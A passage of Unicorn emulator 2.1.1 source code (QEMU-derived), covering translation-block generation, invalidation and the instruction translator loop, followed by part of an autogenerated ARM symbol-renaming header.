gen_intermediate_code, nor * should we re-do the tcg optimization currently hidden * inside tcg_gen_code. All that should be required is to * flush the TBs, allocate a new TB, re-initialize it per * above, and re-do the actual code generation. */ goto buffer_overflow; case -2: /* * The code generated for the TranslationBlock is too large. * The maximum size allowed by the unwind info is 64k. * There may be stricter constraints from relocations * in the tcg backend. * * Try again with half as many insns as we attempted this time. * If a single insn overflows, there's a bug somewhere... */ max_insns = tb->icount; assert(max_insns > 1); max_insns /= 2; goto tb_overflow; default: g_assert_not_reached(); } } search_size = encode_search(cpu->uc, tb, (uint8_t *)gen_code_buf + gen_code_size); if (unlikely(search_size < 0)) { goto buffer_overflow; } tb->tc.size = gen_code_size; tcg_ctx->code_gen_ptr = (void *) ROUND_UP((uintptr_t)gen_code_buf + gen_code_size + search_size, CODE_GEN_ALIGN); /* init jump list */ tb->jmp_list_head = (uintptr_t)NULL; tb->jmp_list_next[0] = (uintptr_t)NULL; tb->jmp_list_next[1] = (uintptr_t)NULL; tb->jmp_dest[0] = (uintptr_t)NULL; tb->jmp_dest[1] = (uintptr_t)NULL; /* init original jump addresses which have been set during tcg_gen_code() */ if (tb->jmp_reset_offset[0] != TB_JMP_RESET_OFFSET_INVALID) { tb_reset_jump(tb, 0); } if (tb->jmp_reset_offset[1] != TB_JMP_RESET_OFFSET_INVALID) { tb_reset_jump(tb, 1); } /* check next page if needed */ virt_page2 = (pc + tb->size - 1) & TARGET_PAGE_MASK; phys_page2 = -1; if ((pc & TARGET_PAGE_MASK) != virt_page2) { phys_page2 = get_page_addr_code(env, virt_page2); } /* Undoes tlb_set_dirty in notdirty_write. */ if (!(HOOK_EXISTS(cpu->uc, UC_HOOK_MEM_READ) || HOOK_EXISTS(cpu->uc, UC_HOOK_MEM_WRITE))) { tlb_reset_dirty_by_vaddr(cpu, pc & TARGET_PAGE_MASK, (pc & ~TARGET_PAGE_MASK) + tb->size); } /* * No explicit memory barrier is required -- tb_link_page() makes the * TB visible in a consistent state. 
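 * (Descriptive note added for clarity:) if another thread has raced us
 * and already registered an identical TB, tb_link_page() returns that
 * existing TB instead; the rewind of code_gen_ptr below then reclaims
 * the code-buffer space this translation used.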
     */
    existing_tb = tb_link_page(cpu->uc, tb, phys_pc, phys_page2);
    /* if the TB already exists, discard what we just translated */
    if (unlikely(existing_tb != tb)) {
        uintptr_t orig_aligned = (uintptr_t)gen_code_buf;

        orig_aligned -= ROUND_UP(sizeof(*tb), tcg_ctx->uc->qemu_icache_linesize);
        tcg_ctx->code_gen_ptr = (void *)orig_aligned;
        return existing_tb;
    }
    tcg_tb_insert(tcg_ctx, tb);
    return tb;
}

/*
 * @p must be non-NULL.
 * user-mode: call with mmap_lock held.
 * !user-mode: call with all @pages locked.
 */
static void
tb_invalidate_phys_page_range__locked(struct uc_struct *uc,
                                      struct page_collection *pages,
                                      PageDesc *p, tb_page_addr_t start,
                                      tb_page_addr_t end, uintptr_t retaddr)
{
    TranslationBlock *tb;
    tb_page_addr_t tb_start, tb_end;
    int n;
#ifdef TARGET_HAS_PRECISE_SMC
    CPUState *cpu = uc->cpu;
    CPUArchState *env = NULL;
    bool current_tb_not_found = retaddr != 0;
    bool current_tb_modified = false;
    TranslationBlock *current_tb = NULL;
    target_ulong current_pc = 0;
    target_ulong current_cs_base = 0;
    uint32_t current_flags = 0;
#endif /* TARGET_HAS_PRECISE_SMC */

    assert_page_locked(p);

#if defined(TARGET_HAS_PRECISE_SMC)
    if (cpu != NULL) {
        env = cpu->env_ptr;
    }
#endif

    /* we remove all the TBs in the range [start, end[ */
    /* XXX: see if in some cases it could be faster to invalidate all the code */
    PAGE_FOR_EACH_TB(p, tb, n) {
        assert_page_locked(p);
        /* NOTE: this is subtle as a TB may span two physical pages */
        if (n == 0) {
            /* NOTE: tb_end may be after the end of the page, but
               it is not a problem */
            tb_start = tb->page_addr[0] + (tb->pc & ~TARGET_PAGE_MASK);
            tb_end = tb_start + tb->size;
        } else {
            tb_start = tb->page_addr[1];
            tb_end = tb_start + ((tb->pc + tb->size) & ~TARGET_PAGE_MASK);
        }
        // Unicorn: We may indeed generate a TB without any instruction which
        // breaks qemu assumption.
        if ((!(tb_end <= start || tb_start >= end)) || (tb_start == tb_end)) {
#ifdef TARGET_HAS_PRECISE_SMC
            if (current_tb_not_found) {
                current_tb_not_found = false;
                /* now we have a real cpu fault */
                current_tb = tcg_tb_lookup(uc->tcg_ctx, retaddr);
            }
            if (current_tb == tb &&
                (tb_cflags(current_tb) & CF_COUNT_MASK) != 1) {
                /*
                 * If we are modifying the current TB, we must stop
                 * its execution. We could be more precise by checking
                 * that the modification is after the current PC, but it
                 * would require a specialized function to partially
                 * restore the CPU state.
                 */
                current_tb_modified = true;
                cpu_restore_state_from_tb(cpu, current_tb, retaddr, true);
                cpu_get_tb_cpu_state(env, &current_pc, &current_cs_base,
                                     &current_flags);
            }
#endif /* TARGET_HAS_PRECISE_SMC */
            tb_phys_invalidate__locked(uc->tcg_ctx, tb);
        }
    }

    /* if no code remaining, no need to continue to use slow writes */
    if (!p->first_tb) {
        invalidate_page_bitmap(p);
        tlb_unprotect_code(uc, start);
    }

#ifdef TARGET_HAS_PRECISE_SMC
    if (current_tb_modified) {
        page_collection_unlock(pages);
        /* Force execution of one insn next time.  */
        cpu->cflags_next_tb = 1 | curr_cflags();
        mmap_unlock();
        cpu_loop_exit_noexc(cpu);
    }
#endif
}

/*
 * Invalidate all TBs which intersect with the target physical address range
 * [start;end[. NOTE: start and end must refer to the *same* physical page.
 * 'is_cpu_write_access' should be true if called from a real cpu write
 * access: the virtual CPU will exit the current TB if code is modified inside
 * this TB.
 *
 * Called with mmap_lock held for user-mode emulation
 */
void tb_invalidate_phys_page_range(struct uc_struct *uc, tb_page_addr_t start,
                                   tb_page_addr_t end)
{
    struct page_collection *pages;
    PageDesc *p;

    assert_memory_lock();

    p = page_find(uc, start >> TARGET_PAGE_BITS);
    if (p == NULL) {
        return;
    }
    pages = page_collection_lock(uc, start, end);
    tb_invalidate_phys_page_range__locked(uc, pages, p, start, end, 0);
    page_collection_unlock(pages);
}

/*
 * Invalidate all TBs which intersect with the target physical address range
 * [start;end[. NOTE: start and end may refer to *different* physical pages.
 * 'is_cpu_write_access' should be true if called from a real cpu write
 * access: the virtual CPU will exit the current TB if code is modified inside
 * this TB.
 *
 * Called with mmap_lock held for user-mode emulation.
 */
void tb_invalidate_phys_range(struct uc_struct *uc, ram_addr_t start,
                              ram_addr_t end)
{
    struct page_collection *pages;
    tb_page_addr_t next;

    assert_memory_lock();

    pages = page_collection_lock(uc, start, end);
    for (next = (start & TARGET_PAGE_MASK) + TARGET_PAGE_SIZE;
         //start < end; Unicorn: Fix possible wrap around
         (intptr_t)(end - start) > 0;
         start = next, next += TARGET_PAGE_SIZE) {
        PageDesc *pd = page_find(uc, start >> TARGET_PAGE_BITS);
        tb_page_addr_t bound = MIN(next, end);

        if (pd == NULL) {
            continue;
        }
        tb_invalidate_phys_page_range__locked(uc, pages, pd, start, bound, 0);
    }
    page_collection_unlock(pages);
}

/* len must be <= 8 and start must be a multiple of len.
 * Called via softmmu_template.h when code areas are written to with
 * iothread mutex not held.
 *
 * Call with all @pages in the range [@start, @start + len[ locked.
 */
void tb_invalidate_phys_page_fast(struct uc_struct *uc,
                                  struct page_collection *pages,
                                  tb_page_addr_t start, int len,
                                  uintptr_t retaddr)
{
    PageDesc *p;

    assert_memory_lock();

    p = page_find(uc, start >> TARGET_PAGE_BITS);
    if (!p) {
        return;
    }

    assert_page_locked(p);
    if (!p->code_bitmap && ++p->code_write_count >= SMC_BITMAP_USE_THRESHOLD) {
        build_page_bitmap(uc, p);
    }
    if (p->code_bitmap) {
        unsigned int nr;
        unsigned long b;

        nr = start & ~TARGET_PAGE_MASK;
        b = p->code_bitmap[BIT_WORD(nr)] >> (nr & (BITS_PER_LONG - 1));
        if (b & ((1 << len) - 1)) {
            goto do_invalidate;
        }
    } else {
    do_invalidate:
        tb_invalidate_phys_page_range__locked(uc, pages, p, start, start + len,
                                              retaddr);
    }
}

/* user-mode: call with mmap_lock held */
void tb_check_watchpoint(CPUState *cpu, uintptr_t retaddr)
{
    TCGContext *tcg_ctx = cpu->uc->tcg_ctx;
    TranslationBlock *tb;

    assert_memory_lock();

    tb = tcg_tb_lookup(tcg_ctx, retaddr);
    if (tb) {
        /* We can use retranslation to find the PC.  */
        cpu_restore_state_from_tb(cpu, tb, retaddr, true);
        tb_phys_invalidate(tcg_ctx, tb, -1);
    } else {
        /* The exception probably happened in a helper. The CPU state should
           have been saved before calling it. Fetch the PC from there.  */
        CPUArchState *env = cpu->env_ptr;
        target_ulong pc, cs_base;
        tb_page_addr_t addr;
        uint32_t flags;

        cpu_get_tb_cpu_state(env, &pc, &cs_base, &flags);
        addr = get_page_addr_code(env, pc);
        if (addr != -1) {
            tb_invalidate_phys_range(cpu->uc, addr, addr + 1);
        }
    }
}

/* in deterministic execution mode, instructions doing device I/Os
 * must be at the end of the TB.
 *
 * Called by softmmu_template.h, with iothread mutex not held.
 */
void cpu_io_recompile(CPUState *cpu, uintptr_t retaddr)
{
    TCGContext *tcg_ctx = cpu->uc->tcg_ctx;
#if defined(TARGET_MIPS) || defined(TARGET_SH4)
    CPUArchState *env = cpu->env_ptr;
#endif
    TranslationBlock *tb;
    uint32_t n;

    tb = tcg_tb_lookup(tcg_ctx, retaddr);
    if (!tb) {
        cpu_abort(cpu, "cpu_io_recompile: could not find TB for pc=%p",
                  (void *)retaddr);
    }
    cpu_restore_state_from_tb(cpu, tb, retaddr, true);

    /* On MIPS and SH, delay slot instructions can only be restarted if
       they were already the first instruction in the TB. If this is not
       the first instruction in a TB then re-execute the preceding branch. */
    n = 1;
#if defined(TARGET_MIPS)
    if ((env->hflags & MIPS_HFLAG_BMASK) != 0 &&
        env->active_tc.PC != tb->pc) {
        env->active_tc.PC -= (env->hflags & MIPS_HFLAG_B16 ? 2 : 4);
        cpu_neg(cpu)->icount_decr.u16.low++;
        env->hflags &= ~MIPS_HFLAG_BMASK;
        n = 2;
    }
#elif defined(TARGET_SH4)
    if ((env->flags & ((DELAY_SLOT | DELAY_SLOT_CONDITIONAL))) != 0 &&
        env->pc != tb->pc) {
        env->pc -= 2;
        cpu_neg(cpu)->icount_decr.u16.low++;
        env->flags &= ~(DELAY_SLOT | DELAY_SLOT_CONDITIONAL);
        n = 2;
    }
#endif

    /* Generate a new TB executing the I/O insn.  */
    cpu->cflags_next_tb = curr_cflags() | CF_LAST_IO | n;

    if (tb_cflags(tb) & CF_NOCACHE) {
        if (tb->orig_tb) {
            /* Invalidate original TB if this TB was generated in
               cpu_exec_nocache() */
            tb_phys_invalidate(tcg_ctx, tb->orig_tb, -1);
        }
        tcg_tb_remove(tcg_ctx, tb);
    }

    /* TODO: If env->pc != tb->pc (i.e. the faulting instruction was not
     * the first in the TB) then we end up generating a whole new TB and
     * repeating the fault, which is horribly inefficient.
     * Better would be to execute just this insn uncached, or generate a
     * second new TB.
     */
    cpu_loop_exit_noexc(cpu);
}

static void tb_jmp_cache_clear_page(CPUState *cpu, target_ulong page_addr)
{
    unsigned int i, i0 = tb_jmp_cache_hash_page(cpu->uc, page_addr);

    for (i = 0; i < TB_JMP_PAGE_SIZE; i++) {
        cpu->tb_jmp_cache[i0 + i] = NULL;
    }
}

void tb_flush_jmp_cache(CPUState *cpu, target_ulong addr)
{
#ifdef TARGET_ARM
    struct uc_struct *uc = cpu->uc;
#endif

    /* Discard jump cache entries for any tb which might potentially
       overlap the flushed page.  */
    tb_jmp_cache_clear_page(cpu, addr - TARGET_PAGE_SIZE);
    tb_jmp_cache_clear_page(cpu, addr);
}

/* This is a wrapper for common code that can not use CONFIG_SOFTMMU */
void tcg_flush_softmmu_tlb(struct uc_struct *uc)
{
    tlb_flush(uc->cpu);
}

#if defined(__APPLE__) && defined(HAVE_PTHREAD_JIT_PROTECT) && \
    defined(HAVE_SPRR) && (defined(__arm__) || defined(__aarch64__))
static bool tb_exec_is_locked(struct uc_struct *uc)
{
    return uc->current_executable;
}

static void tb_exec_change(struct uc_struct *uc, bool executable)
{
    assert(uc->current_executable == thread_executable());
    if (uc->current_executable != executable) {
        jit_write_protect(executable);
        uc->current_executable = executable;
        assert(executable == thread_executable());
    }
}
#else /* not needed on non-Darwin platforms */
static bool tb_exec_is_locked(struct uc_struct *uc)
{
    return false;
}

static void tb_exec_change(struct uc_struct *uc, bool locked) {}
#endif

void tb_exec_lock(struct uc_struct *uc)
{
    /* assumes sys_icache_invalidate already called */
    tb_exec_change(uc, true);
}

void tb_exec_unlock(struct uc_struct *uc)
{
    tb_exec_change(uc, false);
}

unicorn-2.1.1/qemu/accel/tcg/translate-all.h

/*
 * Translated block handling
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifndef TRANSLATE_ALL_H
#define TRANSLATE_ALL_H

#include "exec/exec-all.h"

/* translate-all.c */
struct page_collection *page_collection_lock(struct uc_struct *uc,
                                             tb_page_addr_t start,
                                             tb_page_addr_t end);
void page_collection_unlock(struct page_collection *set);
void tb_invalidate_phys_page_fast(struct uc_struct *uc,
                                  struct page_collection *pages,
                                  tb_page_addr_t start, int len,
                                  uintptr_t retaddr);
void tb_invalidate_phys_page_range(struct uc_struct *uc, tb_page_addr_t start,
                                   tb_page_addr_t end);
void tb_invalidate_phys_range(struct uc_struct *uc, ram_addr_t start,
                              ram_addr_t end);
void tb_check_watchpoint(CPUState *cpu, uintptr_t retaddr);

#endif /* TRANSLATE_ALL_H */

unicorn-2.1.1/qemu/accel/tcg/translator.c

/*
 * Generic intermediate code generation.
 *
 * Copyright (C) 2016-2017 Lluís Vilanova <vilanova@ac.upc.edu>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "tcg/tcg.h"
#include "tcg/tcg-op.h"
#include "exec/exec-all.h"
#include "exec/gen-icount.h"
#include "exec/translator.h"

#include <uc_priv.h>

/* Pairs with tcg_clear_temp_count.
   To be called by #TranslatorOps.{translate_insn,tb_stop} if
   (1) the target is sufficiently clean to support reporting,
   (2) as and when all temporaries are known to be consumed.
   For most targets, (2) is at the end of translate_insn.  */
void translator_loop_temp_check(DisasContextBase *db)
{
#if 0
    if (tcg_check_temp_count()) {
        qemu_log("warning: TCG temporary leaks before "
                 TARGET_FMT_lx "\n", db->pc_next);
    }
#endif
}

void translator_loop(const TranslatorOps *ops, DisasContextBase *db,
                     CPUState *cpu, TranslationBlock *tb, int max_insns)
{
    int bp_insn = 0;
    struct uc_struct *uc = (struct uc_struct *)cpu->uc;
    TCGContext *tcg_ctx = uc->tcg_ctx;
    TCGOp *prev_op = NULL;
    bool block_hook = false;

    /* Initialize DisasContext */
    db->tb = tb;
    db->pc_first = tb->pc;
    db->pc_next = db->pc_first;
    db->is_jmp = DISAS_NEXT;
    db->num_insns = 0;
    db->max_insns = max_insns;
    db->singlestep_enabled = cpu->singlestep_enabled;

    ops->init_disas_context(db, cpu);
    tcg_debug_assert(db->is_jmp == DISAS_NEXT);  /* no early exit */

    /* Reset the temp count so that we can identify leaks */
    tcg_clear_temp_count();

    /* Unicorn: early check to see if the address of this block is
     * the "run until" address. */
    if (uc_addr_is_exit(uc, tb->pc)) {
        // This should catch that instruction is at the end
        // and generate appropriate halting code.
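        // Only a single insn_start/translate_insn pair is emitted on this
        // path: control jumps straight to _end_loop below, skipping the main
        // translation loop, so ops->tb_stop() closes the one-insn block.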
        gen_tb_start(tcg_ctx, db->tb);
        ops->tb_start(db, cpu);
        db->num_insns++;
        ops->insn_start(db, cpu);
        ops->translate_insn(db, cpu);
        goto _end_loop;
    }

    /* Unicorn: trace this block on request
     * Only hook this block if it is not broken from previous translation due to
     * full translation cache */
    if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_BLOCK, tb->pc)) {
        prev_op = tcg_last_op(tcg_ctx);
        block_hook = true;
        gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, uc,
                         db->pc_first);
    }

    // tcg_dump_ops(tcg_ctx, false, "translator loop");

    /* Start translating.  */
    gen_tb_start(tcg_ctx, db->tb);
    // tcg_dump_ops(tcg_ctx, false, "tb start");
    ops->tb_start(db, cpu);
    // tcg_dump_ops(tcg_ctx, false, "tb start 2");
    tcg_debug_assert(db->is_jmp == DISAS_NEXT);  /* no early exit */

    while (true) {
        db->num_insns++;
        ops->insn_start(db, cpu);
        tcg_debug_assert(db->is_jmp == DISAS_NEXT);  /* no early exit */

        /* Pass breakpoint hits to target for further processing */
        if (!db->singlestep_enabled &&
            unlikely(!QTAILQ_EMPTY(&cpu->breakpoints))) {
            CPUBreakpoint *bp;
            QTAILQ_FOREACH(bp, &cpu->breakpoints, entry) {
                if (bp->pc == db->pc_next) {
                    if (ops->breakpoint_check(db, cpu, bp)) {
                        bp_insn = 1;
                        break;
                    }
                }
            }
            /* The breakpoint_check hook may use DISAS_TOO_MANY to indicate
               that only one more instruction is to be executed. Otherwise
               it should use DISAS_NORETURN when generating an exception,
               but may use a DISAS_TARGET_* value for Something Else. */
            if (db->is_jmp > DISAS_TOO_MANY) {
                break;
            }
        }

        /* Disassemble one instruction. The translate_insn hook should
           update db->pc_next and db->is_jmp to indicate what should be
           done next -- either exiting this loop or locating the start of
           the next instruction. */
        ops->translate_insn(db, cpu);
        // tcg_dump_ops(tcg_ctx, false, "insn translate");

        /* Stop translation if translate_insn so indicated.  */
        if (db->is_jmp != DISAS_NEXT) {
            break;
        }

        /* Stop translation if the output buffer is full,
           or we have executed all of the allowed instructions.  */
        if (tcg_op_buf_full(tcg_ctx) || db->num_insns >= db->max_insns) {
            db->is_jmp = DISAS_TOO_MANY;
            break;
        }
    }

_end_loop:
    /* Emit code to exit the TB, as indicated by db->is_jmp.  */
    ops->tb_stop(db, cpu);
    gen_tb_end(tcg_ctx, db->tb, db->num_insns - bp_insn);
    // tcg_dump_ops(tcg_ctx, false, "tb end");

    /* The disas_log hook may use these values rather than recompute.  */
    db->tb->size = db->pc_next - db->pc_first;
    db->tb->icount = db->num_insns;

    hooked_regions_check(uc, db->tb->pc, db->tb->size);

    if (block_hook) {
        TCGOp *tcg_op;

        // Unicorn: patch the callback to have the proper block size.
        if (prev_op) {
            // As explained further up in the function where prev_op is
            // assigned, we move forward in the tail queue, so we're modifying
            // the move instruction generated by gen_uc_tracecode() that
            // contains the instruction size to assign the proper size
            // (replacing 0xF1F1F1F1).
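            // prev_op was captured with tcg_last_op() immediately before
            // gen_uc_tracecode() emitted its ops, so the op following it in
            // the tail queue is the first op of the block-hook call sequence.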
            tcg_op = QTAILQ_NEXT(prev_op, link);
        } else {
            // this basic block is the first emulated code ever,
            // so the basic block operand is the first operand
            tcg_op = QTAILQ_FIRST(&tcg_ctx->ops);
        }
        tcg_op->args[1] = db->tb->size;
    }
}

unicorn-2.1.1/qemu/arm.h

/* Autogen header for Unicorn Engine - DO NOT MODIFY */
#ifndef UNICORN_AUTOGEN_arm_H
#define UNICORN_AUTOGEN_arm_H
#ifndef UNICORN_ARCH_POSTFIX
#define UNICORN_ARCH_POSTFIX _arm
#endif
#define unicorn_fill_tlb unicorn_fill_tlb_arm
#define reg_read reg_read_arm
#define reg_write reg_write_arm
#define uc_init uc_init_arm
#define uc_add_inline_hook uc_add_inline_hook_arm
#define uc_del_inline_hook uc_del_inline_hook_arm
#define tb_invalidate_phys_range tb_invalidate_phys_range_arm
#define use_idiv_instructions use_idiv_instructions_arm
#define arm_arch arm_arch_arm
#define tb_target_set_jmp_target tb_target_set_jmp_target_arm
#define have_bmi1 have_bmi1_arm
#define have_popcnt have_popcnt_arm
#define have_avx1 have_avx1_arm
#define have_avx2 have_avx2_arm
#define have_isa have_isa_arm
#define have_altivec have_altivec_arm
#define have_vsx have_vsx_arm
#define flush_icache_range flush_icache_range_arm
#define s390_facilities s390_facilities_arm
#define tcg_dump_op tcg_dump_op_arm
#define tcg_dump_ops tcg_dump_ops_arm
#define tcg_gen_and_i64 tcg_gen_and_i64_arm
#define tcg_gen_discard_i64 tcg_gen_discard_i64_arm
#define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_arm
#define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_arm
#define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_arm
#define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_arm
#define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_arm
#define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_arm
#define tcg_gen_ld_i64 tcg_gen_ld_i64_arm
#define tcg_gen_mov_i64 tcg_gen_mov_i64_arm
#define tcg_gen_movi_i64 tcg_gen_movi_i64_arm
#define tcg_gen_mul_i64 tcg_gen_mul_i64_arm
#define tcg_gen_or_i64 tcg_gen_or_i64_arm
#define tcg_gen_sar_i64 tcg_gen_sar_i64_arm
#define tcg_gen_shl_i64 tcg_gen_shl_i64_arm
#define tcg_gen_shr_i64 tcg_gen_shr_i64_arm
#define tcg_gen_st_i64 tcg_gen_st_i64_arm
#define tcg_gen_xor_i64 tcg_gen_xor_i64_arm
#define cpu_icount_to_ns cpu_icount_to_ns_arm
#define cpu_is_stopped cpu_is_stopped_arm
#define cpu_get_ticks cpu_get_ticks_arm
#define cpu_get_clock cpu_get_clock_arm
#define cpu_resume cpu_resume_arm
#define qemu_init_vcpu qemu_init_vcpu_arm
#define cpu_stop_current cpu_stop_current_arm
#define resume_all_vcpus resume_all_vcpus_arm
#define vm_start vm_start_arm
#define address_space_dispatch_compact address_space_dispatch_compact_arm
#define flatview_translate flatview_translate_arm
#define address_space_translate_for_iotlb address_space_translate_for_iotlb_arm
#define qemu_get_cpu qemu_get_cpu_arm
#define cpu_address_space_init cpu_address_space_init_arm
#define cpu_get_address_space cpu_get_address_space_arm #define cpu_exec_unrealizefn cpu_exec_unrealizefn_arm #define cpu_exec_initfn cpu_exec_initfn_arm #define cpu_exec_realizefn cpu_exec_realizefn_arm #define tb_invalidate_phys_addr tb_invalidate_phys_addr_arm #define cpu_watchpoint_insert cpu_watchpoint_insert_arm #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_arm #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_arm #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_arm #define cpu_breakpoint_insert cpu_breakpoint_insert_arm #define cpu_breakpoint_remove cpu_breakpoint_remove_arm #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_arm #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_arm #define cpu_abort cpu_abort_arm #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_arm #define memory_region_section_get_iotlb memory_region_section_get_iotlb_arm #define flatview_add_to_dispatch flatview_add_to_dispatch_arm #define qemu_ram_get_host_addr qemu_ram_get_host_addr_arm #define qemu_ram_get_offset qemu_ram_get_offset_arm #define qemu_ram_get_used_length qemu_ram_get_used_length_arm #define qemu_ram_is_shared qemu_ram_is_shared_arm #define qemu_ram_pagesize qemu_ram_pagesize_arm #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_arm #define qemu_ram_alloc qemu_ram_alloc_arm #define qemu_ram_free qemu_ram_free_arm #define qemu_map_ram_ptr qemu_map_ram_ptr_arm #define qemu_ram_block_host_offset qemu_ram_block_host_offset_arm #define qemu_ram_block_from_host qemu_ram_block_from_host_arm #define qemu_ram_addr_from_host qemu_ram_addr_from_host_arm #define cpu_check_watchpoint cpu_check_watchpoint_arm #define iotlb_to_section iotlb_to_section_arm #define address_space_dispatch_new address_space_dispatch_new_arm #define address_space_dispatch_free address_space_dispatch_free_arm #define flatview_read_continue flatview_read_continue_arm #define address_space_read_full address_space_read_full_arm #define address_space_write address_space_write_arm #define address_space_rw address_space_rw_arm #define cpu_physical_memory_rw cpu_physical_memory_rw_arm #define address_space_write_rom address_space_write_rom_arm #define cpu_flush_icache_range cpu_flush_icache_range_arm #define cpu_exec_init_all cpu_exec_init_all_arm #define address_space_access_valid address_space_access_valid_arm #define address_space_map address_space_map_arm #define address_space_unmap address_space_unmap_arm #define cpu_physical_memory_map cpu_physical_memory_map_arm #define cpu_physical_memory_unmap cpu_physical_memory_unmap_arm #define cpu_memory_rw_debug cpu_memory_rw_debug_arm #define qemu_target_page_size qemu_target_page_size_arm #define qemu_target_page_bits qemu_target_page_bits_arm #define qemu_target_page_bits_min qemu_target_page_bits_min_arm #define target_words_bigendian target_words_bigendian_arm #define cpu_physical_memory_is_io cpu_physical_memory_is_io_arm #define ram_block_discard_range ram_block_discard_range_arm #define ramblock_is_pmem ramblock_is_pmem_arm #define page_size_init page_size_init_arm #define set_preferred_target_page_bits set_preferred_target_page_bits_arm #define finalize_target_page_bits finalize_target_page_bits_arm #define cpu_outb cpu_outb_arm #define cpu_outw cpu_outw_arm #define cpu_outl cpu_outl_arm #define cpu_inb cpu_inb_arm #define cpu_inw cpu_inw_arm #define cpu_inl cpu_inl_arm #define memory_map memory_map_arm #define memory_map_io memory_map_io_arm #define memory_map_ptr 
memory_map_ptr_arm #define memory_cow memory_cow_arm #define memory_unmap memory_unmap_arm #define memory_moveout memory_moveout_arm #define memory_movein memory_movein_arm #define memory_free memory_free_arm #define flatview_unref flatview_unref_arm #define address_space_get_flatview address_space_get_flatview_arm #define memory_region_transaction_begin memory_region_transaction_begin_arm #define memory_region_transaction_commit memory_region_transaction_commit_arm #define memory_region_init memory_region_init_arm #define memory_region_access_valid memory_region_access_valid_arm #define memory_region_dispatch_read memory_region_dispatch_read_arm #define memory_region_dispatch_write memory_region_dispatch_write_arm #define memory_region_init_io memory_region_init_io_arm #define memory_region_init_ram_ptr memory_region_init_ram_ptr_arm #define memory_region_size memory_region_size_arm #define memory_region_set_readonly memory_region_set_readonly_arm #define memory_region_get_ram_ptr memory_region_get_ram_ptr_arm #define memory_region_from_host memory_region_from_host_arm #define memory_region_get_ram_addr memory_region_get_ram_addr_arm #define memory_region_add_subregion memory_region_add_subregion_arm #define memory_region_del_subregion memory_region_del_subregion_arm #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_arm #define memory_region_find memory_region_find_arm #define memory_region_filter_subregions memory_region_filter_subregions_arm #define memory_listener_register memory_listener_register_arm #define memory_listener_unregister memory_listener_unregister_arm #define address_space_remove_listeners address_space_remove_listeners_arm #define address_space_init address_space_init_arm #define address_space_destroy address_space_destroy_arm #define memory_region_init_ram memory_region_init_ram_arm #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_arm #define find_memory_mapping find_memory_mapping_arm #define exec_inline_op exec_inline_op_arm #define floatx80_default_nan floatx80_default_nan_arm #define float_raise float_raise_arm #define float16_is_quiet_nan float16_is_quiet_nan_arm #define float16_is_signaling_nan float16_is_signaling_nan_arm #define float32_is_quiet_nan float32_is_quiet_nan_arm #define float32_is_signaling_nan float32_is_signaling_nan_arm #define float64_is_quiet_nan float64_is_quiet_nan_arm #define float64_is_signaling_nan float64_is_signaling_nan_arm #define floatx80_is_quiet_nan floatx80_is_quiet_nan_arm #define floatx80_is_signaling_nan floatx80_is_signaling_nan_arm #define floatx80_silence_nan floatx80_silence_nan_arm #define propagateFloatx80NaN propagateFloatx80NaN_arm #define float128_is_quiet_nan float128_is_quiet_nan_arm #define float128_is_signaling_nan float128_is_signaling_nan_arm #define float128_silence_nan float128_silence_nan_arm #define float16_add float16_add_arm #define float16_sub float16_sub_arm #define float32_add float32_add_arm #define float32_sub float32_sub_arm #define float64_add float64_add_arm #define float64_sub float64_sub_arm #define float16_mul float16_mul_arm #define float32_mul float32_mul_arm #define float64_mul float64_mul_arm #define float16_muladd float16_muladd_arm #define float32_muladd float32_muladd_arm #define float64_muladd float64_muladd_arm #define float16_div float16_div_arm #define float32_div float32_div_arm #define float64_div float64_div_arm #define float16_to_float32 float16_to_float32_arm #define float16_to_float64 float16_to_float64_arm #define 
float32_to_float16 float32_to_float16_arm #define float32_to_float64 float32_to_float64_arm #define float64_to_float16 float64_to_float16_arm #define float64_to_float32 float64_to_float32_arm #define float16_round_to_int float16_round_to_int_arm #define float32_round_to_int float32_round_to_int_arm #define float64_round_to_int float64_round_to_int_arm #define float16_to_int16_scalbn float16_to_int16_scalbn_arm #define float16_to_int32_scalbn float16_to_int32_scalbn_arm #define float16_to_int64_scalbn float16_to_int64_scalbn_arm #define float32_to_int16_scalbn float32_to_int16_scalbn_arm #define float32_to_int32_scalbn float32_to_int32_scalbn_arm #define float32_to_int64_scalbn float32_to_int64_scalbn_arm #define float64_to_int16_scalbn float64_to_int16_scalbn_arm #define float64_to_int32_scalbn float64_to_int32_scalbn_arm #define float64_to_int64_scalbn float64_to_int64_scalbn_arm #define float16_to_int16 float16_to_int16_arm #define float16_to_int32 float16_to_int32_arm #define float16_to_int64 float16_to_int64_arm #define float32_to_int16 float32_to_int16_arm #define float32_to_int32 float32_to_int32_arm #define float32_to_int64 float32_to_int64_arm #define float64_to_int16 float64_to_int16_arm #define float64_to_int32 float64_to_int32_arm #define float64_to_int64 float64_to_int64_arm #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_arm #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_arm #define 